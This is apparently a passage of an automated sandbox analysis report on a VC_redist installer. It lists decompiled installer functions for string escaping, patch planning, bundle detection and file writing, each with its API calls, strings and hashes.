                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: user is active, cannot change user state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                          • API String ID: 3168844106-4121889706
                                                                          • Opcode ID: 5e1e15705ce1926582ce2cba9e5a2d4528ad56ebd50632dc9cd246875f79531f
                                                                          • Instruction ID: 210d8c36afd05f9281813a6554272ae24be43f3ec1240a1e30cad884a3fd161d
                                                                          • Opcode Fuzzy Hash: 5e1e15705ce1926582ce2cba9e5a2d4528ad56ebd50632dc9cd246875f79531f
                                                                          • Instruction Fuzzy Hash: F4311472A40622AB9B219B54EC0ADBF73FDEF54760B14403AFC04EB211DB74ED408B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 49%
                                                                          			E000170D4(void* __ebx, void* __ecx, WCHAR* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _t38;
                                                                          				WCHAR* _t48;
                                                                          				WCHAR* _t49;
                                                                          				void* _t52;
                                                                          				void* _t54;
                                                                          
                                                                          				_t40 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t48 = _a4;
                                                                          				_t52 = E00011EDE( &_v8, lstrlenW(_t48) + 1);
                                                                          				if(_t52 >= 0) {
                                                                          					while(1) {
                                                                          						_t38 = E00043E49(_t40, _t48, L"[]{}");
                                                                          						if(_t38 == 0) {
                                                                          							goto L5;
                                                                          						}
                                                                          						_t52 = E00011EF2( &_v8, _t48, _t38);
                                                                          						if(_t52 < 0) {
                                                                          							_push("Failed to append characters.");
                                                                          							L14:
                                                                          							_push(_t52);
                                                                          							E0005012F();
                                                                          						} else {
                                                                          							goto L5;
                                                                          						}
                                                                          						L15:
                                                                          						goto L16;
                                                                          						L5:
                                                                          						_t49 =  &(_t48[_t38]);
                                                                          						_t40 = 0;
                                                                          						_t24 =  *_t49 & 0x0000ffff;
                                                                          						if(0 == ( *_t49 & 0x0000ffff)) {
                                                                          							_t52 = E000121A5(_a8, _v8, 0);
                                                                          							if(_t52 < 0) {
                                                                          								_push("Failed to copy string.");
                                                                          								goto L14;
                                                                          							}
                                                                          						} else {
                                                                          							_t52 = E00011F20( &_v12, L"[\\%c]", _t24);
                                                                          							_t54 = _t54 + 0xc;
                                                                          							if(_t52 < 0) {
                                                                          								_push("Failed to format escape sequence.");
                                                                          								goto L14;
                                                                          							} else {
                                                                          								_t52 = E00011EF2( &_v8, _v12, 0);
                                                                          								if(_t52 < 0) {
                                                                          									_push("Failed to append escape sequence.");
                                                                          									goto L14;
                                                                          								} else {
                                                                          									_t48 =  &(_t49[1]);
                                                                          									continue;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to allocate buffer for escaped string.");
                                                                          					_push(_t52);
                                                                          					E0005012F();
                                                                          				}
                                                                          				L16:
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				return _t52;
                                                                          			}











                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000), ref: 000170E7
                                                                          Strings
                                                                          • Failed to allocate buffer for escaped string., xrefs: 000170FE
                                                                          • Failed to append characters., xrefs: 00017173
                                                                          • Failed to copy string., xrefs: 0001719B
                                                                          • [\%c], xrefs: 00017146
                                                                          • Failed to format escape sequence., xrefs: 00017181
                                                                          • Failed to append escape sequence., xrefs: 0001717A
                                                                          • []{}, xrefs: 00017111
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                          • API String ID: 1659193697-3250950999
                                                                          • Opcode ID: 00456c2da70b40062fda527180aaa6bd239af1befac3a1f8e7c67e1a3c5329cd
                                                                          • Instruction ID: b13d1309e5fdea5fb31460f1609278cda5e86b71df538876e79e0758d66f5cbb
                                                                          • Opcode Fuzzy Hash: 00456c2da70b40062fda527180aaa6bd239af1befac3a1f8e7c67e1a3c5329cd
                                                                          • Instruction Fuzzy Hash: 65210A33949325BEEB269698DC03FEF76B99F00722F200166FE04B7141DB75AEC49294
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 69%
                                                                          			E000359B0(void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _t124;
                                                                          				void* _t126;
                                                                          				intOrPtr _t152;
                                                                          				intOrPtr _t155;
                                                                          				intOrPtr* _t157;
                                                                          				signed int _t169;
                                                                          				signed int _t170;
                                                                          				intOrPtr _t172;
                                                                          				signed int _t173;
                                                                          				signed int _t182;
                                                                          				signed int _t183;
                                                                          				intOrPtr* _t194;
                                                                          				signed int _t196;
                                                                          				intOrPtr _t197;
                                                                          				signed int _t199;
                                                                          				intOrPtr _t202;
                                                                          				intOrPtr* _t204;
                                                                          				signed int _t205;
                                                                          				intOrPtr* _t207;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_t169 = _a8;
                                                                          				_t196 = _a12;
                                                                          				if(_t169 == 0) {
                                                                          					_t202 =  *((intOrPtr*)(_t196 + 0x5c));
                                                                          				} else {
                                                                          					_t202 =  *((intOrPtr*)(_t196 + 0x64));
                                                                          				}
                                                                          				if(_t169 == 0) {
                                                                          					_t124 =  *((intOrPtr*)(_t196 + 0x60));
                                                                          				} else {
                                                                          					_t124 =  *((intOrPtr*)(_t196 + 0x68));
                                                                          				}
                                                                          				_a12 = _a12 & 0x00000000;
                                                                          				_t175 = 0;
                                                                          				_v8 = _t124;
                                                                          				_a8 = 0;
                                                                          				if(_t124 == 0) {
                                                                          					L14:
                                                                          					_push( &_a12);
                                                                          					_push(_t196);
                                                                          					if(_t169 == 0) {
                                                                          						_t126 = E00021CAA(_t175);
                                                                          					} else {
                                                                          						_t126 = E00021CF1(_t175);
                                                                          					}
                                                                          					if(_t126 >= 0) {
                                                                          						_t204 = _a32;
                                                                          						 *_a12 = 6;
                                                                          						 *((intOrPtr*)(_a12 + 0x24)) = _a24;
                                                                          						 *((intOrPtr*)(_a12 + 8)) = _a28;
                                                                          						__eflags =  *_t204 - 4;
                                                                          						 *(_a12 + 0x18) = 0 |  *_t204 == 0x00000004;
                                                                          						 *((intOrPtr*)(_a12 + 0x20)) = E0003371C( *((intOrPtr*)(_a28 + 0x98)), _a4,  *((intOrPtr*)(_a12 + 0x24)));
                                                                          						 *((intOrPtr*)(_a12 + 0x10)) =  *((intOrPtr*)(_t204 + 0x58));
                                                                          						 *((intOrPtr*)(_a12 + 0x14)) =  *((intOrPtr*)(_t204 + 0x5c));
                                                                          						_t205 = E000121A5(_a12 + 0xc, _t204 + 8, 0);
                                                                          						__eflags = _t205;
                                                                          						if(_t205 >= 0) {
                                                                          							_t182 = _a12;
                                                                          							__eflags =  *(_t182 + 0x18);
                                                                          							if( *(_t182 + 0x18) != 0) {
                                                                          								 *((intOrPtr*)(_t196 + 0xc)) = 1;
                                                                          							}
                                                                          							_t197 = _a28;
                                                                          							_t72 = _t182 + 0x1c; // 0x1c
                                                                          							E000242BA(_t182, _t197,  *((intOrPtr*)(_t182 + 0xc)), _t169, _a16, _a20, _t72);
                                                                          							_t183 = _a12;
                                                                          							goto L23;
                                                                          						}
                                                                          						_push("Failed to copy target product code.");
                                                                          					} else {
                                                                          						_push("Failed to plan action for target product.");
                                                                          					}
                                                                          					goto L28;
                                                                          				} else {
                                                                          					_t207 = _t202 + 0x18;
                                                                          					do {
                                                                          						_t157 = _t207 - 0x18;
                                                                          						_a12 = _t157;
                                                                          						if( *_t157 == 6 &&  *((intOrPtr*)(_t207 + 0xc)) == _a24) {
                                                                          							_t194 = _a32;
                                                                          							if( *_t207 != (0 |  *_t194 == 0x00000004)) {
                                                                          								goto L13;
                                                                          							}
                                                                          							if(CompareStringW(0, 0,  *(_t207 - 0xc), 0xffffffff, _t194 + 8, 0xffffffff) == 2) {
                                                                          								_t175 = _a12;
                                                                          								__eflags = _a12;
                                                                          								if(_a12 == 0) {
                                                                          									goto L14;
                                                                          								}
                                                                          								__eflags = _t169;
                                                                          								if(_t169 != 0) {
                                                                          									L22:
                                                                          									_t197 = _a28;
                                                                          									L23:
                                                                          									_t41 = _t183 + 0x28; // 0x28
                                                                          									_t205 = E000138F6(_t41, _t183, _t41,  *((intOrPtr*)(_t183 + 0x2c)) + 1, 8, 2);
                                                                          									__eflags = _t205;
                                                                          									if(_t205 >= 0) {
                                                                          										 *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x28)) +  *(_a12 + 0x2c) * 8)) =  *((intOrPtr*)(_a32 + 4));
                                                                          										 *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x28)) + 4 +  *(_a12 + 0x2c) * 8)) = _t197;
                                                                          										 *(_a12 + 0x2c) =  *(_a12 + 0x2c) + 1;
                                                                          										_t170 = _a12;
                                                                          										_t199 =  *((intOrPtr*)(_t170 + 0x2c)) - 1;
                                                                          										__eflags = _t199;
                                                                          										if(_t199 == 0) {
                                                                          											L29:
                                                                          											return _t205;
                                                                          										} else {
                                                                          											goto L36;
                                                                          										}
                                                                          										while(1) {
                                                                          											L36:
                                                                          											_t172 =  *((intOrPtr*)(_t170 + 0x28));
                                                                          											_t152 =  *((intOrPtr*)(_t172 + _t199 * 8));
                                                                          											__eflags = _t152 -  *((intOrPtr*)(_t172 + _t199 * 8 - 8));
                                                                          											if(_t152 >=  *((intOrPtr*)(_t172 + _t199 * 8 - 8))) {
                                                                          												goto L29;
                                                                          											}
                                                                          											 *((intOrPtr*)(_t172 + _t199 * 8 - 8)) = _t152;
                                                                          											 *((intOrPtr*)(_t172 + _t199 * 8 - 4)) =  *((intOrPtr*)(_t172 + 4 + _t199 * 8));
                                                                          											_t155 =  *((intOrPtr*)(_a12 + 0x28));
                                                                          											 *((intOrPtr*)(_t155 + _t199 * 8)) =  *((intOrPtr*)(_t172 + _t199 * 8 - 8));
                                                                          											 *((intOrPtr*)(_t155 + 4 + _t199 * 8)) =  *((intOrPtr*)(_t172 + _t199 * 8 - 4));
                                                                          											_t199 = _t199 - 1;
                                                                          											__eflags = _t199;
                                                                          											if(_t199 == 0) {
                                                                          												goto L29;
                                                                          											}
                                                                          											_t170 = _a12;
                                                                          										}
                                                                          										goto L29;
                                                                          									}
                                                                          									_push("Failed grow array of ordered patches.");
                                                                          									L28:
                                                                          									_push(_t205);
                                                                          									E0005012F();
                                                                          									goto L29;
                                                                          								}
                                                                          								__eflags = _a36 - _t169;
                                                                          								if(__eflags == 0) {
                                                                          									goto L22;
                                                                          								}
                                                                          								_a24 = _a24 & _t169;
                                                                          								_t173 = _a8;
                                                                          								_t205 = E00022297(_t175, __eflags, _t173, _t196,  &_a24);
                                                                          								__eflags = _t205;
                                                                          								if(_t205 >= 0) {
                                                                          									 *_a24 = 2;
                                                                          									 *((intOrPtr*)(_a24 + 8)) = _a36;
                                                                          									_t36 = _t173 + 1; // 0x1
                                                                          									_t183 = _t36 * 0x30 +  *((intOrPtr*)(_t196 + 0x5c));
                                                                          									__eflags = _t183;
                                                                          									_a12 = _t183;
                                                                          									goto L22;
                                                                          								}
                                                                          								_push("Failed to insert execute action.");
                                                                          								goto L28;
                                                                          							}
                                                                          							_t175 = _a8;
                                                                          						}
                                                                          						L13:
                                                                          						_a12 = _a12 & 0x00000000;
                                                                          						_t207 = _t207 + 0x30;
                                                                          						_t175 = _t175 + 1;
                                                                          						_a8 = _t175;
                                                                          					} while (_t175 < _v8);
                                                                          					goto L14;
                                                                          				}
                                                                          			}























                                                                          0x00000000
                                                                          0x00035bb9
                                                                          0x00035bb9
                                                                          0x00035bb9
                                                                          0x00035bbc
                                                                          0x00035bbf
                                                                          0x00035bc3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035bd1
                                                                          0x00035bd9
                                                                          0x00035be0
                                                                          0x00035be3
                                                                          0x00035be6
                                                                          0x00035bea
                                                                          0x00035bea
                                                                          0x00035bed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035bf3
                                                                          0x00035bf3
                                                                          0x00000000
                                                                          0x00035bb9
                                                                          0x00035ab2
                                                                          0x00035ac9
                                                                          0x00035ac9
                                                                          0x00035aca
                                                                          0x00000000
                                                                          0x00035ad0
                                                                          0x00035a52
                                                                          0x00035a55
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035a57
                                                                          0x00035a5d
                                                                          0x00035a68
                                                                          0x00035a6a
                                                                          0x00035a6c
                                                                          0x00035a7b
                                                                          0x00035a84
                                                                          0x00035a87
                                                                          0x00035a8d
                                                                          0x00035a8d
                                                                          0x00035a90
                                                                          0x00000000
                                                                          0x00035a90
                                                                          0x00035a6e
                                                                          0x00000000
                                                                          0x00035a6e
                                                                          0x00035a24
                                                                          0x00035a24
                                                                          0x00035a27
                                                                          0x00035a27
                                                                          0x00035a2b
                                                                          0x00035a2e
                                                                          0x00035a2f
                                                                          0x00035a32
                                                                          0x00000000
                                                                          0x000359e8

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000000,0005B4F0,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,0003659B,?,00000001,?,0005B490), ref: 00035A19
                                                                          Strings
                                                                          • Failed grow array of ordered patches., xrefs: 00035AB2
                                                                          • Failed to plan action for target product., xrefs: 00035AC4
                                                                          • Failed to insert execute action., xrefs: 00035A6E
                                                                          • Failed to copy target product code., xrefs: 00035B4C
                                                                          • feclient.dll, xrefs: 00035A0F, 00035B39
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                          • API String ID: 1825529933-3477540455
                                                                          • Opcode ID: edf2fa8209736fd6535981276db18e3d0046adc5ffc8f6207b967b0a14a749e1
                                                                          • Instruction ID: 3097142145e2a628942fa713114fa55a00d3a8a55675b243efd0941a2b637de1
                                                                          • Opcode Fuzzy Hash: edf2fa8209736fd6535981276db18e3d0046adc5ffc8f6207b967b0a14a749e1
                                                                          • Instruction Fuzzy Hash: 6B8114B5604B5A9FCB16CF54C880AAA77E9FF08325F15866AEC158B362D730EC51CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E00039039(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                          				int _v8;
                                                                          				intOrPtr _v12;
                                                                          				short* _t46;
                                                                          				intOrPtr* _t51;
                                                                          				void* _t80;
                                                                          				intOrPtr* _t87;
                                                                          				intOrPtr _t91;
                                                                          				intOrPtr* _t92;
                                                                          				intOrPtr* _t96;
                                                                          				intOrPtr _t97;
                                                                          				intOrPtr _t99;
                                                                          				int _t102;
                                                                          				void* _t114;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_t99 = _a12;
                                                                          				_t102 = 0;
                                                                          				_v8 = 0;
                                                                          				_t46 =  *(_t99 + 0xbc);
                                                                          				if(_t46 != 0 && CompareStringW(0, 1, _t46, 0xffffffff,  *(_t99 + 0x10), 0xffffffff) != 2) {
                                                                          					_t51 =  *((intOrPtr*)(_t99 + 0x40));
                                                                          					if(_t51 != 0 &&  *_t51 != 0) {
                                                                          						_t96 = _a8;
                                                                          						if( *_t96 != 5) {
                                                                          							__eflags =  *_t96 - 3;
                                                                          							if( *_t96 == 3) {
                                                                          								L9:
                                                                          								__eflags = E00037B00(_t96, _t99, _t51);
                                                                          								_t80 = 1;
                                                                          								_t88 =  !=  ? _t80 : 0;
                                                                          								_v8 =  !=  ? _t80 : 0;
                                                                          							} else {
                                                                          								__eflags =  *_t96 - 6;
                                                                          								if( *_t96 == 6) {
                                                                          									goto L9;
                                                                          								} else {
                                                                          									__eflags =  *_t96 - 7;
                                                                          									if( *_t96 == 7) {
                                                                          										goto L9;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_v8 = 1;
                                                                          						}
                                                                          					}
                                                                          					_t91 = 0;
                                                                          					_a12 = 0;
                                                                          					if( *((intOrPtr*)(_t99 + 0xb8)) > 0) {
                                                                          						_t97 = 0;
                                                                          						_v12 = 0;
                                                                          						do {
                                                                          							_t87 =  *((intOrPtr*)(_t99 + 0xb4)) + _t97;
                                                                          							if( *_t87 != 2) {
                                                                          								goto L18;
                                                                          							} else {
                                                                          								_t114 =  *((intOrPtr*)(_t99 + 0x3c)) -  *((intOrPtr*)(_t87 + 0xc));
                                                                          								if(_t114 > 0 || _t114 >= 0 &&  *((intOrPtr*)(_t99 + 0x38)) >  *((intOrPtr*)(_t87 + 8))) {
                                                                          									goto L18;
                                                                          								} else {
                                                                          									if(CompareStringW(0, 1,  *(_t99 + 0xbc), 0xffffffff,  *(_t87 + 0x18), 0xffffffff) == 2) {
                                                                          										_t92 =  *((intOrPtr*)(_a4 + 0x10));
                                                                          										_a12 =  *((intOrPtr*)( *_t92 + 0x1c))(_t92,  *(_t87 + 0x18),  *_t87,  *((intOrPtr*)(_t87 + 0x10)),  *((intOrPtr*)(_t87 + 0x2c)),  *((intOrPtr*)(_t87 + 8)),  *((intOrPtr*)(_t87 + 0xc)), _v8);
                                                                          										_t102 = E0001D58B(_a4, 1, _t59);
                                                                          										__eflags = _t102;
                                                                          										if(_t102 >= 0) {
                                                                          											__eflags = _a12 - 1;
                                                                          											if(__eflags != 0) {
                                                                          												L27:
                                                                          												_push(E00023C30( *((intOrPtr*)(_t99 + 0xc4))));
                                                                          												_push(E000243FA( *((intOrPtr*)(_t87 + 8)),  *((intOrPtr*)(_t87 + 0xc))));
                                                                          												_push(E000240EF( *((intOrPtr*)(_t87 + 0x2c))));
                                                                          												_push(E0002416A( *_t87));
                                                                          												E0001550F(2, 0x2000006b,  *(_t87 + 0x18));
                                                                          											} else {
                                                                          												_t39 = _t99 + 0xc8; // 0x4d8
                                                                          												_t102 = E0003C517(_t92, __eflags, _t39, _a8, 0,  *((intOrPtr*)(_t99 + 0x40)),  *((intOrPtr*)(_t99 + 0xc0)), _t87 + 0x18);
                                                                          												__eflags = _t102;
                                                                          												if(_t102 >= 0) {
                                                                          													__eflags = 1;
                                                                          													 *((intOrPtr*)(_t99 + 0xc4)) = 1;
                                                                          													goto L27;
                                                                          												} else {
                                                                          													_push("Failed to initialize update bundle.");
                                                                          													goto L22;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											E000137D3(_t62, "detect.cpp", 0x7e, _t102);
                                                                          											_push("BA aborted detect forward compatible bundle.");
                                                                          											L22:
                                                                          											_push(_t102);
                                                                          											E0005012F();
                                                                          										}
                                                                          									} else {
                                                                          										_t91 = _a12;
                                                                          										_t97 = _v12;
                                                                          										goto L18;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							goto L28;
                                                                          							L18:
                                                                          							_t91 = _t91 + 1;
                                                                          							_t97 = _t97 + 0xf8;
                                                                          							_a12 = _t91;
                                                                          							_v12 = _t97;
                                                                          						} while (_t91 <  *((intOrPtr*)(_t99 + 0xb8)));
                                                                          					}
                                                                          				}
                                                                          				L28:
                                                                          				return _t102;
                                                                          			}

















                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00026F20,000000B8,0000001C,00000100), ref: 00039068
                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0005B4A8,000000FF,?,?,?,00026F20,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 00039101
                                                                          Strings
                                                                          • comres.dll, xrefs: 00039187
                                                                          • detect.cpp, xrefs: 00039163
                                                                          • Failed to initialize update bundle., xrefs: 000391A9
                                                                          • BA aborted detect forward compatible bundle., xrefs: 0003916D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                          • API String ID: 1825529933-439563586
                                                                          • Opcode ID: 454e5b4a114acd15431c6248f0a64f0c90c7d730bfad446d27a234804a858ec2
                                                                          • Instruction ID: 6e30da84da91c4c808e308f8f063c332a30f3872cf4c95fe4cbf0e3f0b2de32a
                                                                          • Opcode Fuzzy Hash: 454e5b4a114acd15431c6248f0a64f0c90c7d730bfad446d27a234804a858ec2
                                                                          • Instruction Fuzzy Hash: 5851CF71600212BFDF5A9F64CC85EAAB7AEFF05320F104664F915DA291D771EC60DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 50%
                                                                          			E000561FA(void* __ecx, intOrPtr _a4, void* _a8, long _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed short _t39;
                                                                          				void* _t40;
                                                                          				signed short _t48;
                                                                          				signed int _t49;
                                                                          				intOrPtr* _t50;
                                                                          				void* _t54;
                                                                          				void* _t60;
                                                                          				signed int _t61;
                                                                          				intOrPtr* _t64;
                                                                          				void* _t67;
                                                                          
                                                                          				_t62 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t64 = _a12;
                                                                          				_t67 = E000547D3(__ecx, _a8,  *_t64,  *((intOrPtr*)(_t64 + 4)), 0, 0);
                                                                          				if(_t67 >= 0) {
                                                                          					while(1) {
                                                                          						L2:
                                                                          						_push( &_v8);
                                                                          						_push(_a32);
                                                                          						_push(_a28);
                                                                          						_push(_a4);
                                                                          						if( *0x7a974() == 0) {
                                                                          							break;
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							_t60 = 0;
                                                                          							_a12 = _a12 & 0;
                                                                          							while(WriteFile(_a8, _a28 + _t60, _v8 - _t60,  &_a12, 0) != 0) {
                                                                          								_t60 = _t60 + _a12;
                                                                          								if(_a12 == 0 || _t60 >= _v8) {
                                                                          									 *_t64 =  *_t64 + _t60;
                                                                          									_t49 = 0;
                                                                          									asm("adc [edi+0x4], eax");
                                                                          									if(_a16 != 0xffffffff) {
                                                                          										_t61 = _t49;
                                                                          										_v12 = _t49;
                                                                          										if(E000547D3(_t62, _a16, _t49, _t49, _t49, _t49) >= 0) {
                                                                          											do {
                                                                          												_push(0);
                                                                          												_push( &_v12);
                                                                          												_t54 = 8;
                                                                          												WriteFile(_a16, _t64 + _t61 * 8, _t54 - _t61, ??, ??);
                                                                          												_t61 = _t61 + _v12;
                                                                          											} while (_v12 != 0 && _t61 < 8);
                                                                          										}
                                                                          									}
                                                                          									_t50 = _a36;
                                                                          									if(_t50 == 0 ||  *_t50 == 0) {
                                                                          										L15:
                                                                          										if(_v8 != 0) {
                                                                          											goto L2;
                                                                          										} else {
                                                                          										}
                                                                          									} else {
                                                                          										_t67 = E00055B46(_t50,  *_t64,  *((intOrPtr*)(_t64 + 4)), _a20, _a24, _a8);
                                                                          										if(_t67 >= 0) {
                                                                          											goto L15;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									continue;
                                                                          								}
                                                                          								goto L20;
                                                                          							}
                                                                          							_t48 = GetLastError();
                                                                          							_t74 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							_t40 = 0x80004005;
                                                                          							_t67 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t67);
                                                                          							_push(0x1a6);
                                                                          							L19:
                                                                          							_push("dlutil.cpp");
                                                                          							E000137D3(_t40);
                                                                          						}
                                                                          						L20:
                                                                          						goto L21;
                                                                          					}
                                                                          					_t39 = GetLastError();
                                                                          					_t71 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                          					_t40 = 0x80004005;
                                                                          					_t67 =  >=  ? 0x80004005 :  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t67);
                                                                          					_push(0x19a);
                                                                          					goto L19;
                                                                          				}
                                                                          				L21:
                                                                          				return _t67;
                                                                          			}
















                                                                          APIs
                                                                            • Part of subcall function 000547D3: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547EB
                                                                            • Part of subcall function 000547D3: GetLastError.KERNEL32(?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547F5
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00055AC5,?,?,?,?,?,?,?,00010000,?), ref: 00056263
                                                                          • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00055AC5,?,?,?,?), ref: 000562B5
                                                                          • GetLastError.KERNEL32(?,00055AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 000562FB
                                                                          • GetLastError.KERNEL32(?,00055AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00056321
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$Write$Pointer
                                                                          • String ID: @Met$dlutil.cpp
                                                                          • API String ID: 133221148-1896680629
                                                                          • Opcode ID: 04ccf8eeee1a6867857f2aa9ed82292a124a95268b0e3c1e54dd0c0734e76af9
                                                                          • Instruction ID: bd3627624020c4d4625252508e8126151e1376805e22b6a250f4d963501472c6
                                                                          • Opcode Fuzzy Hash: 04ccf8eeee1a6867857f2aa9ed82292a124a95268b0e3c1e54dd0c0734e76af9
                                                                          • Instruction Fuzzy Hash: 2F417E72900619BFEF218E94CD48BEB7BA8EF04352F540225FD04E7190D776DD64DAA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E000501F0(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				short _v1048;
                                                                          				char _v1052;
                                                                          				struct HINSTANCE__* _v1056;
                                                                          				struct HINSTANCE__* _v1060;
                                                                          				long _v1064;
                                                                          				void* __ebp;
                                                                          				signed int _t25;
                                                                          				long _t29;
                                                                          				intOrPtr _t46;
                                                                          				intOrPtr _t47;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          				void* _t54;
                                                                          				char* _t56;
                                                                          				void* _t61;
                                                                          				unsigned int _t62;
                                                                          				unsigned int _t64;
                                                                          				void* _t68;
                                                                          				void* _t70;
                                                                          				void* _t71;
                                                                          				void* _t72;
